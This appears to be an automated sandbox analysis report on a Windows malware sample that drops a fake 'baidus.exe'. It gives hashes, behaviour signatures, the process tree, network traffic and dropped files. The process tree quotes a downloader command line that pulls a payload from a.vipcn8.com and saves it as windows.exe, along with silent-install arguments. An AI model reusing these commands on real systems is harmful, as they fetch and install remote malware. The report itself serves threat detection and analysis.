Analysis

  • max time kernel
    170s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27/11/2022, 13:02 UTC

General

  • Target

    2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe

  • Size

    685KB

  • MD5

    c3955e1a939254d0baba61e7b2975653

  • SHA1

    1b5a5cb1f4eb10776d7ee8ca766e420cd6fa6c57

  • SHA256

    2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65

  • SHA512

    94a22ed7884399306a3ae64dc111295511b8fbcf35433c9bb065dbe9057dbb5fd2371cbd0584662d24031215b719eb19d1f2b3e8efcf0d0e4a7c8242ee2d6875

  • SSDEEP

    12288:RtUBGy8Xz0MqcPHDc2YpKSouCsBvplyt1E5Mx8QVfqlrI+SyjDyD0lRWbk7SZ:UBaXz0MqcPHDc2YpKSo1sBh8t1E5MxZ/

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe
    "C:\Users\Admin\AppData\Local\Temp\2e6d71ea5a964e35203aa41a739fd9b4a1fa1008095f10b4f9094423f2604e65.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Program Files (x86)\baidus.exe
      "C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp" /SL5="$701C6,67416,56832,C:\Program Files (x86)\baidus.exe" /VERYSILENT /SP-
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Adds Run key to start application
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Program Files (x86)\baidu\baidus.exe
          "C:\Program Files (x86)\baidu\baidus.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:3172
        • C:\Program Files (x86)\baidu\baidus.exe
          "C:\Program Files (x86)\baidu\baidus.exe" -u=http://a.vipcn8.com/test/3.txt -n=windows.exe
          4⤵
          • Executes dropped EXE
          PID:3828
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2888
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 2
        3⤵
        • Runs ping.exe
        PID:3680

Network

  • DNS
    a.vipcn8.com
    baidus.exe
    Remote address:
    8.8.8.8:53
    Request
    a.vipcn8.com
    IN A
    Response
    a.vipcn8.com
    IN A
    35.205.61.67
  • DNS
    151.122.125.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.122.125.40.in-addr.arpa
    IN PTR
    Response
  • DNS
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    IN PTR
    Response
  • 8.253.208.113:80
    104 B
    2
  • 93.184.220.29:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 192.168.1.2:80
    baidus.exe
    260 B
    5
  • 35.205.61.67:80
    a.vipcn8.com
    baidus.exe
    260 B
    5
  • 13.107.21.200:443
    www.bing.com
    tls
    611 B
    7.4kB
    9
    9
  • 93.184.220.29:80
    260 B
    5
  • 52.242.97.97:443
    260 B
    5
  • 20.42.65.84:443
    322 B
    7
  • 8.253.208.113:80
    322 B
    7
  • 8.253.208.113:80
    322 B
    7
  • 8.253.208.113:80
    260 B
    5
  • 8.8.8.8:53
    a.vipcn8.com
    dns
    baidus.exe
    58 B
    74 B
    1
    1

    DNS Request

    a.vipcn8.com

    DNS Response

    35.205.61.67

  • 8.8.8.8:53
    151.122.125.40.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    151.122.125.40.in-addr.arpa

  • 8.8.8.8:53
    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa
    dns
    118 B
    204 B
    1
    1

    DNS Request

    2.8.0.0.0.0.0.0.0.0.0.0.0.0.0.0.3.0.0.0.4.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Program Files (x86)\baidu\baidus.data

    Filesize

    18KB

    MD5

    6daf9e443cbc584c52f88c1c5890aa79

    SHA1

    127d5d1d4463c176dedcc18c702daf354a34ff9e

    SHA256

    1845a6842901f74e86f05741dbb688b63c54b5fbeaf33baea208041004f1e4bd

    SHA512

    f10837c23bf0e4316351c793f4bb23f74ae1f860c55c50a323f2951a490c43336926d6e15742836c8ec398917d2c461be0a1ef61aec1d3e659f24594dd8db57d

  • C:\Program Files (x86)\baidu\baidus.exe

    Filesize

    7KB

    MD5

    b155d1a64ad43bdfc95ccaeac0cd6eae

    SHA1

    a2f5c051ffff7a3cb2e9cdf7be916b02ab1f94fe

    SHA256

    a83354ce6d20fc4042997ee553ac8aabe4734d0f15f5f85c2a1f1b0fd2db2015

    SHA512

    a9a1f848f59073103489e185991a609f2ab66bc12db20ebf67475fe3bcec732169dee775e63d1e035f4f59450c742310c3c080c703a5ebea0c3ff907649a069f

  • C:\Program Files (x86)\baidus.exe

    Filesize

    305KB

    MD5

    0f91865b8855efd8fd7805e15141d622

    SHA1

    7a73a294710cbf530410008c175f7abbfadd8e6f

    SHA256

    d8a9112e4fa78352f01ab8247421a88d3d1b043974c8212b7277992eb11111f2

    SHA512

    b87f40b9ab25b02e2650eff3ebda7c156f4c5991a540f3f0dcb2f864caf4304bc4be9f495f5c89adeb021bbcb54d53d9cf94b115bc5a8dde43fd7da277d97ed2

  • C:\Users\Admin\AppData\Local\Temp\HZ~E081.tmp.bat

    Filesize

    266B

    MD5

    e5e32265dd5b1be1560ab3029a7a465a

    SHA1

    4fdc6c2e5a4d5648fdf3cd5d52897d436d03f2da

    SHA256

    44b80154fbbb5e50e93d5203a0a6fbedf7de23c0a396e1de1c997a4a690d3e2b

    SHA512

    e43259682895cc665ffa2bd4496da218c01e6725dedd6f9934f926c462217de6413fdf0b75f00d8a7ad0d563b670525d8e3650add67e5ad72d13c01a0ac3a4d1

  • C:\Users\Admin\AppData\Local\Temp\is-RTNE4.tmp\baidus.tmp

    Filesize

    691KB

    MD5

    9303156631ee2436db23827e27337be4

    SHA1

    018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

    SHA256

    bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

    SHA512

    9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

  • memory/436-143-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/436-135-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/436-152-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/3172-148-0x00000000001D0000-0x00000000001D7000-memory.dmp

    Filesize

    28KB

  • memory/3172-153-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3172-154-0x00000000001D0000-0x00000000001D7000-memory.dmp

    Filesize

    28KB

  • memory/3828-151-0x0000000000030000-0x0000000000037000-memory.dmp

    Filesize

    28KB

  • memory/3828-155-0x0000000000030000-0x0000000000037000-memory.dmp

    Filesize

    28KB
